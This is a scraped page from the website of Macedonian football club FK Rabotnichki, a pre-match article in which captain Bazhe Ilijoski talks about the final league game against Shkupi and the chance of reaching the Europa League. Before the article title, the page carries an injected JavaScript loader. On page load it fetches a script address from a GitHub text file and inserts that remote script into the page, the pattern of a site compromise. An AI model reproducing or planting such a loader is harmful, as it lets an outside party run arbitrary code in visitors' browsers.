;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Илијоски: Не чека ’финале’ против Шкупи, а влогот е Европа
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Илијоски: Не чека ’финале’ против Шкупи, а влогот е Европа

Работнички во последното коло од шампионатот, утре (16.30 часот) на „Тодор Проески“ арена го пречекува тимот на Шкупи. Во последните 90 минути, влогот е огромен, а составот на Баже Лазаревски сака да го задржи четвртото место кое води во квалификациите за Лигата на Европа. Со триумф над Шкупи, па дури и нерешен резултат, европскиот сон ќе стане реалност.

Капитенот Баже Илијоски вели дека последниот првенствен меч е големо ’финале’ за Работнички.

„Не очекува вистинско ’финале’, многу важен натпревар против Шкупи. Влогот е излез во Европа, а противникот исто така се надева дека ќе успее да ја оствари целта. Ќе биде тешко, неизвесно, го знаеме тоа. Го респектираме и противникот, но подготвени сме за голема борба. Ќе играме на домашен терен и ќе сториме се за да стигнеме до позитивен резултат, кој ќе не одведе во Лигата на Европа. Во еден момент помисливме дека шансите се загубени, сега повторно имаме се во свои раце, и треба тоа да го искористиме. Свесни сме за тоа и веруваме во успех“, вели Баже Илијоски.

Утрешниот натпревар ќе го суди Марјан Гоцевски од Струмица.